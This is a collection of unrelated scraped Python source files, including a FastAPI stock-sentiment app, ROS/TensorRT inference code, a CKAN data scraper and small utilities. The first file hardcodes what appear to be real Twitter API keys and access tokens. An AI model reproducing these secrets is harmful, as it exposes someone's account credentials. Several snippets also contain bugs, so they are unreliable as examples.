TextBlob\n\n\n\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\n\nconsumer_key='4hZQpGGEiaz1MGfpwl1ZkoKHs'\nconsumer_secret='m1M7DOOgJcGtvI87jIFgCcToYIwEeXZYZGVstp0fjJglFP2LXq'\naccess_token_key='493637502-Mk3univd84qV3w15PAdgELGldT3cWaQ5QvAPMmhB'\naccess_token_secret='4Bd2Dt4eW26fx1o2bn6F9M4rfFWhFG8qbdweYKnIl8kzC'\n\n@app.get(\"/\")\ndef index(request: Request):\n stock_filter = request.query_params.get('filter', False)\n\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n\n if stock_filter == 'new_closing_highs':\n cursor.execute(\"\"\"\n select * from (\n select symbol, name, stock_id, max(close), date\n from stock_price join stock on stock.id = stock_price.stock_id\n group by stock_id\n order by symbol\n ) where date = (select max(date) from stock_price)\n \"\"\")\n elif stock_filter == 'new_closing_lows':\n cursor.execute(\"\"\"\n select * from (\n select symbol, name, stock_id, min(close), date\n from stock_price join stock on stock.id = stock_price.stock_id\n group by stock_id\n order by symbol\n ) where date = (select max(date) from stock_price)\n \"\"\")\n elif stock_filter == 'rsi_overbought':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where rsi_14 > 70\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n \n elif stock_filter == 'rsi_oversold':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where rsi_14 < 30\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'above_sma_20':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close > sma_20\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'below_sma_20':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close < sma_20\n AND date=(select max(date) from stock_price)\n order by symbol\n \"\"\")\n\n elif stock_filter == 'above_sma_50':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close > sma_50\n AND date = (select max(date) from stock_price)\n order by symbol\n \"\"\")\n elif stock_filter == 'below_sma_50':\n cursor.execute(\"\"\"\n select symbol, name, stock_id, date\n from stock_price join stock on stock.id = stock_price.stock_id\n where close < sma_50\n AND date=(select max(date) from stock_price)\n order by symbol\n \"\"\")\n \n else:\n cursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock ORDER BY symbol\n \"\"\")\n\n rows = cursor.fetchall()\n\n current_date = date.today().isoformat()\n\n cursor.execute(\"\"\"\n select symbol, rsi_14, sma_20, sma_50, close\n from stock join stock_price on stock_price.stock_id = stock.id\n where date = (select max(date) from stock_price)\n \"\"\")\n\n indicator_rows = cursor.fetchall()\n\n indicator_values = {}\n\n for row in indicator_rows:\n indicator_values[row['symbol']] = row\n\n return templates.TemplateResponse(\"index.html\", {\"request\": request, \"stocks\": rows, \"indicator_values\": indicator_values})\n\n@app.get(\"/stock/{symbol}\")\ndef stock_detail(request: Request, symbol):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n cursor.execute(\"\"\"\n SELECT * FROM strategy\n \"\"\")\n strategies = cursor.fetchall()\n\n cursor.execute(\"\"\"\n SELECT id, symbol, name FROM stock WHERE symbol = ?\n \"\"\",(symbol,))\n row = cursor.fetchone()\n cursor.execute(\"\"\"\n SELECT * FROM stock_price WHERE stock_id = ? ORDER BY date DESC\n \"\"\", (row['id'],))\n\n prices = cursor.fetchall()\n\n tickersearch = yf.Ticker(symbol)\n beta = tickersearch.info['beta']\n MarketCap = tickersearch.info['marketCap']\n Volume = tickersearch.info['volume']\n High52 = tickersearch.info['fiftyTwoWeekLow']\n Low52 = tickersearch.info['fiftyTwoWeekHigh']\n AverageVol = tickersearch.info['averageDailyVolume10Day']\n Trailpe = tickersearch.info['trailingPE']\n Forwardpe = tickersearch.info['forwardPE']\n sharesf = tickersearch.info['floatShares']\n sharesS = tickersearch.info['sharesShort']\n shortRatio = tickersearch.info['shortRatio']\n institutions = tickersearch.info['heldPercentInstitutions']\n ptob = tickersearch.info['priceToBook']\n peg = tickersearch.info['pegRatio']\n summary = tickersearch.info['longBusinessSummary']\n meanticker = yf.Ticker(symbol)\n meanticker_hist = meanticker.history(period=\"1y\")\n mean = statistics.mean(meanticker_hist['Close'])\n variance = statistics.variance(meanticker_hist['Close'])\n std = statistics.stdev(meanticker_hist['Close'])\n\n spy = yf.Ticker(\"SPY\")\n spy_hist = spy.history(period=\"1y\")\n spy_hist = spy_hist.pct_change()\n meanticker_histnew = meanticker_hist.pct_change()\n correlation = spy_hist['Close'].corr(meanticker_histnew['Close'])\n return templates.TemplateResponse(\"stock_detail.html\", {\"request\": request, \"stock\": row, \"bars\": prices, \"strategies\": strategies,\"betas\": beta,\"MC\": MarketCap,\"Volume\": Volume,\"High52\": High52,\n \"Low52\": Low52,\"Volume10day\": AverageVol,\"Trailpe\": Trailpe,\"Forwardpe\": Forwardpe,\"sharesf\": sharesf,\"sharesS\": sharesS,\"shortRatio\": shortRatio,\"Institutions\": institutions,\"ptob\": ptob,\"peg\": peg,\"summary\": summary,\"mean\": mean,\"variance\": variance,\"std\": std,\"correlation\": correlation})\n\n@app.post(\"/apply_strategy\")\ndef apply_strategy(strategy_id: int = Form(...), stock_id: int = Form(...)):\n connection = sqlite3.connect(config.DB_FILE)\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n INSERT INTO stock_strategy (stock_id, strategy_id) VALUES (?, ?)\n \"\"\", (stock_id, strategy_id))\n\n connection.commit()\n\n return RedirectResponse(url=f\"/strategy/{strategy_id}\", status_code=303)\n\n@app.get(\"/orders\")\ndef orders(request: Request):\n return templates.TemplateResponse(\"orders.html\", {\"request\": request})\n\n@app.get(\"/strategies\")\ndef strategies(request: Request):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n SELECT * FROM strategy\n \"\"\")\n strategies = cursor.fetchall()\n\n return templates.TemplateResponse(\"strategies.html\", {\"request\": request, \"strategies\": strategies})\n\n@app.get(\"/strategy/{strategy_id}\")\ndef strategy(request: Request,strategy_id):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n SELECT id, name\n FROM strategy\n WHERE id = ?\n \"\"\", (strategy_id,))\n\n strategy = cursor.fetchone()\n\n cursor.execute(\"\"\"\n SELECT symbol, name\n FROM stock JOIN stock_strategy on stock_strategy.stock_id = stock.id\n WHERE strategy_id = ?\n \"\"\", (strategy_id,))\n\n stocks = cursor.fetchall()\n\n return templates.TemplateResponse(\"strategy.html\", {\"request\": request, \"stocks\": stocks, \"strategy\": strategy})\n\n@app.get(\"/wsb_tracker\")\ndef wsb(request: Request):\n connection = sqlite3.connect(config.DB_FILE)\n connection.row_factory = sqlite3.Row\n cursor = connection.cursor()\n\n cursor.execute(\"\"\"\n select count(*) as num_mentions, stock_id, symbol,dt,stock.name\n from mention join stock on stock.id = mention.stock_id\n where dt between '2021-02-11T00:00:00' and '2021-02-11T23:59:59'\n group by stock_id, symbol\n order by num_mentions DESC;\n \"\"\")\n wsbs = cursor.fetchall()\n \n api = PushshiftAPI()\n\n start_epoch=int(datetime.datetime(2021, 3, 17).timestamp())\n\n submissions = list(api.search_submissions(after=start_epoch,subreddit='wallstreetbets',filter=['url','author','title','subreddit'], limit=25))\n\n df = pd.DataFrame(submissions)\n\n vader = SentimentIntensityAnalyzer()\n scores = df['title'].apply(vader.polarity_scores).tolist()\n scores_df = pd.DataFrame(scores)\n\n df = df.join(scores_df, rsuffix='_right')\n new_df = df[['title', 'compound']].copy()\n new_df.rename(columns={ new_df.columns[1]: \"Sentiment Score\" }, inplace = True)\n new_df.rename(columns={ new_df.columns[0]: \"Post\" }, inplace = True)\n html2 = new_df.to_html(classes='ui striped table')\n\n return templates.TemplateResponse(\"wsb_tracker.html\", {\"request\": request, \"wsbs\": wsbs,\"posts\": html2})\n\n@app.get('/prophet')\ndef read_form(request: Request):\n\n return templates.TemplateResponse(\"prophet.html\", {\"request\": request})\n\n@app.post('/prophet')\ndef predict_species(request: Request):\n\n \n \n return templates.TemplateResponse(\"prophet.html\", {\"request\": request})\n\n@app.get(\"/correlation\")\ndef correlation(request: Request):\n tickerp1 = \"\"\n tickerp2 = \"\"\n \n return templates.TemplateResponse(\"correlation.html\", {\"request\": request,\"tickerp1\": tickerp1,\"tickerp2\": tickerp2})\n\n@app.post(\"/correlation\")\ndef correlation_form(request: Request,ticker1: str = Form(...),ticker2: str = Form(...)):\n tickerp1 = ticker1\n tickerp2 = ticker2\n corticker1 = yf.Ticker(tickerp1)\n corticker2 = yf.Ticker(tickerp2)\n corticker1_hist = corticker1.history(period=\"1y\")\n corticker2_hist = corticker2.history(period=\"1y\")\n corticker1_dataframe = corticker1_hist.pct_change()\n corticker2_dataframe = corticker2_hist.pct_change()\n correlation = corticker1_dataframe['Close'].corr(corticker2_dataframe['Close'])\n return templates.TemplateResponse(\"correlation.html\", {\"request\": request,\"tickerp1\": tickerp1,\"tickerp2\": tickerp2,\"correlation\": correlation})\n\n@app.get(\"/stationary\")\ndef stationarity(request: Request):\n stationaryticker = \"\"\n return templates.TemplateResponse(\"stationarity.html\", {\"request\": request,\"stationaryticker\": stationaryticker})\n\n@app.post(\"/stationary\")\ndef stationarity_form(request: Request,sticker: str = Form(...)):\n stationaryticker = sticker\n stticker1 = yf.Ticker(stationaryticker)\n stticker1_hist = stticker1.history(period=\"1y\")\n data = adfuller(stticker1_hist['Close'])\n adfstatistic = data[0]\n pvalue = data[1]\n criticalvalue1 = data[4]['1%']\n criticalvalue5 = data[4]['5%']\n criticalvalue10 = data[4]['10%']\n return templates.TemplateResponse(\"stationarity.html\", {\"request\": request,\"stationaryticker\": stationaryticker,\"adfstatistic\":adfstatistic,\"pvalue\":pvalue,\"criticalvalue1\":criticalvalue1,\"criticalvalue5\":criticalvalue5,\"criticalvalue10\":criticalvalue10})\n\n@app.get(\"/sentiment\")\ndef sentiment(request: Request):\n sentimenttickers = \"\"\n return templates.TemplateResponse(\"sentiment.html\", {\"request\": request,\"sentimenttickers\": sentimenttickers})\n\n@app.post(\"/sentiment\")\ndef sentiment_form(request: Request,sentimentticker: str = Form(...)):\n sentimenttickers = sentimentticker\n stock = finvizfinance(sentimenttickers)\n news_df = stock.TickerNews()\n news_df.style.set_properties(**{'text-align': 'left'})\n html = news_df.to_html(classes='ui striped table')\n vader = SentimentIntensityAnalyzer()\n scores = news_df['Title'].apply(vader.polarity_scores).tolist()\n scores_df = pd.DataFrame(scores)\n news_df = news_df.join(scores_df, rsuffix='_right')\n news_df['Date'] = pd.to_datetime(news_df.Date).dt.date\n mean_scores = news_df.groupby(['Date']).mean()\n mean_scores = mean_scores.unstack()\n mean_scores = mean_scores.xs('compound').transpose()\n mean_scores = mean_scores.to_frame()\n mean_scores = mean_scores.reset_index()\n mean_scores.rename(columns={ mean_scores.columns[1]: \"Sentiment Score\" }, inplace = True)\n html2 = mean_scores.to_html(classes='ui striped table')\n dates = mean_scores['Date']\n scores = list(mean_scores['Sentiment Score'])\n return templates.TemplateResponse(\"sentiment.html\", {\"request\": request,\"sentimenttickers\": sentimenttickers,\"news\":html,\"date_scores\":html2,\"dates\": dates,\"scores\":scores})\n\n@app.get(\"/mean_reversion\")\ndef mean_reversion(request: Request):\n stocks = pd.read_csv('C:\\\\Users\\\\pconn\\\\OneDrive\\\\Desktop\\\\Stock Picks\\\\PicksWeek22Feb.csv')\n stocks.style.set_properties(**{'text-align': 'left'})\n html = stocks.to_html(classes='ui striped table')\n return templates.TemplateResponse(\"mean_reversion.html\", {\"request\": request,\"stocks\":html})\n\n@app.get(\"/momentum_stocks\")\ndef momentum_stocks(request: Request):\n stocks = pd.read_csv('C:\\\\Users\\\\pconn\\\\OneDrive\\\\Desktop\\\\Stock Picks\\\\momentum_stocks.csv')\n stocks.style.set_properties(**{'text-align': 'left'})\n html = stocks.to_html(classes='ui striped table')\n return templates.TemplateResponse(\"momentum_stocks.html\", {\"request\": request,\"stocks\":html})\n\n@app.get('/arima')\ndef arima_model(request: Request):\n\n return templates.TemplateResponse(\"arima.html\", {\"request\": request})\n\n@app.get(\"/disclaimer\")\ndef disclaimer(request: Request):\n return templates.TemplateResponse(\"disclaimer.html\", {\"request\": request})\n\n@app.get(\"/contact\")\ndef contact(request: Request):\n return templates.TemplateResponse(\"contact.html\", {\"request\": request})\n\n@app.get(\"/resources\")\ndef resource(request: Request):\n return templates.TemplateResponse(\"resources.html\", {\"request\": request})\n\n@app.get(\"/home\")\ndef home(request: Request):\n return templates.TemplateResponse(\"home.html\", {\"request\": request})\n\n@app.get(\"/twitter_sentiment\")\ndef twitter_sentiment(request: Request):\n twittersentimenttickers = \"\"\n return templates.TemplateResponse(\"twitter_sentiment.html\", {\"request\": request,\"twittersentimenttickers\": twittersentimenttickers})\n\n@app.post(\"/twitter_sentiment\")\ndef twitter_sentiment_form(request: Request,twitterticker: str = Form(...)):\n twittersentimenttickers = twitterticker\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token_key, access_token_secret)\n api = tweepy.API(auth)\n def fetch_tweets(hashtag):\n tweet_user = []\n tweet_time = []\n tweet_string = []\n for tweet in tweepy.Cursor(api.search,q=hashtag, count=2000).items(2000):\n if (not tweet.retweeted) and (\"RT @\" not in tweet.text):\n if tweet.lang == \"en\":\n tweet_user.append(tweet.user.name)\n tweet_time.append(tweet.created_at)\n tweet_string.append(tweet.text)\n\n df = pd.DataFrame({\"username\":tweet_user, \"time\": tweet_time, \"tweet\": tweet_string})\n return df\n df = fetch_tweets(twittersentimenttickers)\n df[\"sentiment\"] = df[\"tweet\"].apply(lambda tweet: TextBlob(tweet).sentiment.polarity)\n df_pos = df[df[\"sentiment\"] > 0.0]\n df_neg = df[df[\"sentiment\"] < 0.0]\n new_df = df[['tweet', 'sentiment']].copy()\n positive = len(df_pos)\n negative = len(df_neg)\n new_df.rename(columns={ new_df.columns[1]: \"Sentiment Score\" }, inplace = True)\n new_df.rename(columns={ new_df.columns[0]: \"Tweet\" }, inplace = True)\n html2 = new_df.head().to_html(classes='ui striped table')\n tickersearch = yf.Ticker(twittersentimenttickers)\n Close = tickersearch.info['previousClose']\n Open = tickersearch.info['regularMarketOpen']\n High = tickersearch.info['regularMarketDayHigh']\n Low = tickersearch.info['dayLow']\n Volume = tickersearch.info['volume']\n high52 = tickersearch.info['fiftyTwoWeekHigh']\n low52 = tickersearch.info['fiftyTwoWeekLow']\n data = tickersearch.history()\n last_quote = (data.tail(1)['Close'].iloc[0])\n \n return templates.TemplateResponse(\"twitter_sentiment.html\", {\"request\": request,\"twittersentimenttickers\": twittersentimenttickers,\"positive\":positive,\"negative\":negative,\"posts\":html2,\"Close\":Close,\"Open\":Open,\"High\":High,\"Low\":Low,\"Volume\":Volume,\"high52\":high52,\"low52\":low52,\"last_quote\":last_quote})\n\n","repo_name":"paulc160/FullStackStocksWebApplication","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15153392589","text":"import numpy as np\nimport pandas as pd\n\nfrom forecast_model import __version__ as _version\nfrom forecast_model.config.core import config\nfrom forecast_model.processing.data_manager import load_pipeline\n\n\npipeline_file_name = f\"{config.app_config.pipeline_save_file}{_version}.pkl\"\n_forecast_pipe = load_pipeline(file_name=pipeline_file_name)\n\ndef get_forecast(*,forecast_period: int,) -> dict:\n \"\"\"Make a prediction using a saved model pipeline.\"\"\"\n\n #results = {\"predictions\": None, \"version\": _version, \"errors\": errors}\n\n errors = None\n\n\n try:\n future_df = _forecast_pipe.make_future_dataframe(periods = forecast_period, freq='B')\n forecast = _forecast_pipe.predict(future_df)\n #take only the predictions out of the DataFrame\n predictions = forecast.iloc[-forecast_period:]\n forecast_dates = list(predictions['ds'])\n forecast_prices = list(predictions['yhat'])\n\n except TypeError:\n errors = 'Oops! Looks like your forecast time frame isnt valid'\n\n results = {\"forecast_dates\": forecast_dates, \"forecast_prices\": forecast_prices,\"version\": _version, \"errors\": errors}\n\n return results\n","repo_name":"Olaitan94/CAD-USD-Price-Forecast","sub_path":"CADUSD_forecast_package/forecast_model/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72182555366","text":"#!/usr/bin/env python3\n# -*-coding:utf-8 -*-\nimport os\nimport torch\nimport torch.nn as nn\nimport sys\nimport numpy as np\nimport rospy\nfrom std_msgs.msg import Float64MultiArray\nimport time\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nrepo_path, _ = os.path.split(os.path.realpath(__file__))\nrepo_path, _ = os.path.split(repo_path)\nsys.path.append(repo_path)\nfrom OCNet.common.seed import seed_all\nfrom OCNet.common.config import CFG\nfrom OCNet.common.dataset import get_dataset\nfrom OCNet.common.logger import get_logger\nfrom OCNet.common.io_tools import dict_to, _create_directory\nimport OCNet.data.io_data as SemanticKittiIO\n\n\ndef load_engine(trt_runtime, engine_path):\n with open(engine_path, 'rb') as f:\n engine_data = f.read()\n engine = trt_runtime.deserialize_cuda_engine(engine_data)\n return engine\n\n\ndef run_trt_model(context, input_data, trt_engine):\n input_volume = np.prod(input_data.shape)\n inputs, outputs, bindings, stream = [], [], [], None\n for binding in trt_engine:\n size = trt.volume(trt_engine.get_binding_shape(binding)) * trt_engine.max_batch_size\n dtype = trt.nptype(trt_engine.get_binding_dtype(binding))\n host_mem = cuda.pagelocked_empty(size, dtype)\n device_mem = cuda.mem_alloc(host_mem.nbytes)\n\n bindings.append(int(device_mem))\n if trt_engine.binding_is_input(binding):\n inputs.append({\"host_mem\": host_mem, \"device_mem\": device_mem, \"binding\": binding})\n else:\n outputs.append({\"host_mem\": host_mem, \"device_mem\": device_mem, \"binding\": binding})\n\n stream = cuda.Stream()\n input_mem = inputs[0][\"host_mem\"].reshape(input_data.shape)\n input_mem = input_mem[:np.prod(input_data.shape)]\n\n input_mem = inputs[0][\"host_mem\"].reshape(np.prod(input_data.shape))\n np.copyto(input_mem, input_data.ravel())\n\n cuda.memcpy_htod_async(inputs[0][\"device_mem\"], inputs[0][\"host_mem\"], stream)\n context.execute_async_v2(bindings=bindings, stream_handle=stream.handle)\n cuda.memcpy_dtoh_async(outputs[0][\"host_mem\"], outputs[0][\"device_mem\"], stream)\n stream.synchronize()\n\n return outputs[0][\"host_mem\"].reshape(1, -1)\n\n\ndef publish_coordinates(coordinates, publisher):\n coordinates = coordinates[:, [0, 2, 1]]\n coordinates_msg = Float64MultiArray()\n\n for coordinate in coordinates:\n print(f\"coordinate : {coordinate}\")\n coordinates_msg.data.extend(coordinate)\n\n publisher.publish(coordinates_msg)\n\n\ndef test(trt_model_path, dset, _cfg, logger, out_path_root, coordinates_publisher):\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n dtype = torch.float32\n\n inv_remap_lut = dset.dataset.get_inv_remap_lut()\n inference_time = []\n trt_runtime = trt.Runtime(trt.Logger(trt.Logger.WARNING))\n engine = load_engine(trt_runtime, trt_model_path)\n context = engine.create_execution_context()\n\n with torch.no_grad():\n for t, (data, indices) in enumerate(dset):\n\n data = dict_to(data, device, dtype)\n input_data = data['3D_OCCUPANCY'].cpu().numpy()\n # Record the inference start time\n inference_start_time = time.time()\n\n result = run_trt_model(context, input_data, engine)\n print(\"Result shape:\", result.shape)\n # Record the inference end time\n inference_end_time = time.time()\n \n # Log the inference time of each sample\n inference_time.append(inference_end_time - inference_start_time)\n\n scores = np.argmax(result, axis=1)\n for key in scores:\n scores[key] = torch.argmax(scores[key], dim=1).data.cpu().numpy()\n curr_index = 0\n for score in scores['pred_semantic_1_1']:\n # voxel occupancy file\n input_filename = dset.dataset.filepaths['3D_OCCUPANCY'][indices[curr_index]]\n print(input_filename)\n\n # Read the voxel occupancy from the file\n voxel_occupancy = SemanticKittiIO._read_occupancy_SemKITTI(input_filename)\n\n # Reshape the voxel occupancy array to the correct dimensions\n voxel_occupancy = voxel_occupancy.reshape(256, 32, 256)\n\n # Create a mask for occupied voxels\n voxel_mask = voxel_occupancy.ravel() == 1\n\n # Count the occupied voxels in the voxel file\n voxel_occupied_count = np.count_nonzero(voxel_mask)\n\n # Create a mask for occupied voxels in scores\n score_mask = score.ravel() > 0\n\n # Count the occupied voxels in scores\n score_occupied_count = np.count_nonzero(score_mask)\n\n # Compute the intersection of occupied voxels in both score and voxel_occupancy\n intersection = np.logical_and(voxel_mask, score_mask)\n\n # Count the intersected occupied voxels\n intersection_count = np.count_nonzero(intersection)\n\n # Compute the non-intersected occupied voxels coordinates in voxel_occupancy\n non_intersection = np.logical_and(score_mask, np.logical_not(voxel_mask))\n\n # Get the non-intersected occupied voxel coordinates\n non_intersection_coordinates = np.column_stack(np.nonzero(non_intersection.reshape(256, 32, 256)))\n\n publish_coordinates(non_intersection_coordinates, coordinates_publisher)\n \n score = np.moveaxis(score, [0, 1, 2], [0, 2, 1]).reshape(-1).astype(np.uint16)\n score = inv_remap_lut[score].astype(np.uint16)\n \n \n filename, extension = os.path.splitext(os.path.basename(input_filename))\n out_filename = os.path.join(out_path_root, 'predictions', filename + '.label')\n _create_directory(os.path.dirname(out_filename))\n score.tofile(out_filename)\n # shutil.copy(input_filename, ori_voxels_path)\n os.remove(input_filename)\n curr_index += 1\n \n return inference_time\n\n\ndef main():\n rospy.init_node(\"inference_node\")\n #Create the publisher using a specific ROS message type and topic\n coordinates_publisher = rospy.Publisher('/non_intersection_coordinates', Float64MultiArray, queue_size=1000)\n\n \n torch.backends.cudnn.enabled = False\n seed_all(0)\n weights_f = rospy.get_param('~weights_file')\n dataset_f = rospy.get_param('~dataset_root')\n out_path_root = rospy.get_param('~output_path')\n\n assert os.path.isfile(weights_f), '=> No file found at {}'\n\n checkpoint_path = torch.load(weights_f)\n config_dict = checkpoint_path.pop('config_dict')\n config_dict['DATASET']['ROOT_DIR'] = dataset_f\n\n _cfg = CFG()\n _cfg.from_dict(config_dict)\n logger = get_logger(out_path_root, 'logs_test.log')\n logger.info('============ Test weights: \"%s\" ============\\n' % weights_f)\n\n wait_time = 2 # Seconds to wait before checking the dataset folder again\n train_batch_size = 6 # Set your desired batch size here\n \n while not rospy.is_shutdown():\n \n dataset = None\n while dataset is None:\n # Check if the dataset folder has sufficient data (files) for the batch size\n dataset_files = os.listdir(dataset_f)\n if len(dataset_files) >= train_batch_size:\n dataset = get_dataset(_cfg)['test']\n else:\n rospy.loginfo(\"Waiting for dataset folder to accumulate sufficient files.\")\n rospy.sleep(wait_time)\n \n logger.info('=> Loading network architecture...')\n trt_model_path = \"/home/melodic/Aerial-Walker/src/ocnet_ros/OCNet/weight/LMSCNet.trt\"\n rate = rospy.Rate(10)\n inference_time = test(trt_model_path, dataset, _cfg, logger, out_path_root, coordinates_publisher)\n logger.info('Inference time per frame is %.4f seconds\\n' % (np.sum(inference_time) / 6.0))\n logger.info('=> ============ Network Test Done ============')\n rate.sleep()\n\n \nif __name__ == '__main__':\n main()","repo_name":"jmwang0117/Aerial-Walker","sub_path":"src/ocnet_ros/OCNet/inference_trt.py","file_name":"inference_trt.py","file_ext":"py","file_size_in_byte":8198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31057972035","text":"from colorama import Fore\n\n# colocando uma biblioteca para cores!\nrepetir = \"sim\"\nsenha = int(9981)\nl_nomes = [\"Lucas\", \"João\", \"Gabriel\"]\n\nwhile repetir == \"sim\":\n u_nome = input(\"Digite o nome do usuário: \").capitalize()\n\n while u_nome not in l_nomes:\n u_nome = input(\n \"Nome de usuário não encontrado! Tente novamente: \").capitalize()\n\n u_senha = int(input(\"Digite a senha de acesso: \"))\n\n for i in range(0, 3):\n if u_senha == senha:\n break\n else:\n print(f\"Senha incorreta tente novamente!\")\n u_senha = int(\n input(f\"Digite a senha novamente! Restam apenas: {2-i} tentativas: \"))\n\n print(\"FIM\")\n repetir = input(\"Deseja repetir a operação? 'sim' ou 'não': \").lower()\n","repo_name":"AllexAldir/OFM","sub_path":"Projetos_/Projetos_python/ptr01.py","file_name":"ptr01.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11530180478","text":"\n\n\n\n\n\nimport pandas as pd\nimport json\nfrom urllib.request import urlopen\nimport csv\nimport wget\nimport os\nimport io\nimport re\n\n#import the central json file\n#orga=\"statistisches-amt-kanton-zuerich\"\norga=\"statistisches-amt-kanton-basel-stadt\"\nurl=\"https://ckan.opendata.swiss/api/3/action/package_search?fq=organization:\"+orga+\"&rows=1000\"\njson_url = urlopen(url)\ndata = json.load(json_url)\n\ncomplex_simple=\"complex\"\n\ntitles=[]\npublishers=[]\ntexts=[]\n\ndef pasteme(input1,input2):\n return str(input1)+\" \"+str(input2)\n\n\nfor i,entry in enumerate(data['result']['results']):\n output=\"\"\n print(i,\":\",entry['identifier'],\" \",entry['title_for_slug'])\n output=pasteme(output,entry['title']['de'])\n \n \n if complex_simple==\"complex\":\n output=pasteme(output,entry['description']['de'])\n \n \n for j,obj in enumerate(entry['resources']):\n output=pasteme(output,obj['display_name']['de'])\n output=pasteme(output,obj['title']['de'])\n output=pasteme(output,obj['description']['de'])\n output=pasteme(output,obj['name']['de'])\n\n\n\n\n for j,obj in enumerate(entry['keywords']['de']):\n output=pasteme(output,obj)\n\n for j,obj in enumerate(entry['relations']):\n output=pasteme(output,obj['label'])\n\n for j,obj in enumerate(entry['tags']):\n output=pasteme(output,obj['display_name'])\n\n for j,obj in enumerate(entry['groups']):\n output=pasteme(output,obj['display_name']['de'])\n \n print(output)\n titles.append(str(entry['title_for_slug']))\n publishers.append(str(entry['publishers'][0]['label']))\n texts.append(output)\n \n \n \ndf = pd.DataFrame(zip(titles,publishers,texts), columns=['title_slug', 'publisher','text'])\ndf.to_csv('data_matching/'+orga+'.csv',index=False)\n","repo_name":"groovytron/statbot","sub_path":"LOD02_Matching.py","file_name":"LOD02_Matching.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"38994631431","text":"import sys\n\ndef readMultipleLinesTwo():\n\tN = 1000000\n\tprint(sum([int(input()) for i in range(N)]))\n\ndef readMultipleLinesOne(): \n\tN = 1000000\n\tS = 0\n\tfor i in range(N):\n\t\tS += int(input())\n\tprint(S)\n\ndef readOneLine(): \n\tS = sum(list(map(int, input().split())))\n\tprint(S)\n\ndef main():\n\ttry:\n\t\tX = int(sys.argv[1])\n\t\tif X == 1: \n\t\t\treadOneLine()\n\t\telif X == 2:\n\t\t\treadMultipleLinesOne()\n\t\telif X == 3: \n\t\t\treadMultipleLinesTwo()\n\texcept getopt.GetoptError as error:\n\t\tprint(error)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"antsaukk/libalgos","sub_path":"python-benchmark-stdin/pybench.py","file_name":"pybench.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30572058416","text":"import asyncio\nimport random\n\nfrom .exceptions import SubscriptionError\n\nclass Subscription:\n '''Tracks the status of a subscription.\n The ready property can be used to determine if a subscription is ready.\n The error property can be used to determine if a subscription encountered an error.\n '''\n \n def __init__(self, name):\n self._id = str(random.randint(0, 1000000))\n self._name = name\n \n self.ready = False\n self.error = None\n \n self._ready_event = asyncio.Event()\n\n def __ready__(self):\n self._ready_event.set()\n \n def __error__(self, error):\n self.error = error\n self._ready_event.set()\n \n async def wait(self):\n '''This coroutine waits for the subscription to become ready.\n If the server responds with an error then a ddp_asyncio.SubscriptionError will be raised.\n '''\n \n await self._ready_event.wait()\n if self.error: raise SubscriptionError(self.error.get('message', self.error))\n","repo_name":"hunternet93/ddp_asyncio","sub_path":"ddp_asyncio/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"29836507504","text":"class AzureOpenAIRequestHistoryDTO:\r\n \r\n Prompt : str = None\r\n Type : str = None\r\n \r\n def __init__(self, Prompt, Type):\r\n self.Prompt = Prompt\r\n self.Type = Type\r\n\r\nclass AzureOpenAIRequestDTO:\r\n\r\n Prompt : str = None\r\n Index : str = None\r\n Model : str = None\r\n History : list[AzureOpenAIRequestHistoryDTO] = []\r\n\r\n def __init__(self, Prompt : str, Index : str, Model : str, History):\r\n self.Prompt = Prompt\r\n self.Index = Index\r\n self.Model = Model\r\n \r\n for item in History:\r\n self.History.append(AzureOpenAIRequestHistoryDTO(**item))\r\n \r\n def get_system_template(self):\r\n result = \"\"\r\n\r\n for item in self.History:\r\n if (item.Type == \"System\"):\r\n result += item.Prompt + \"\\n\"\r\n\r\n return result\r\n \r\n def dispose(self):\r\n for item in self.History:\r\n del item\r\n 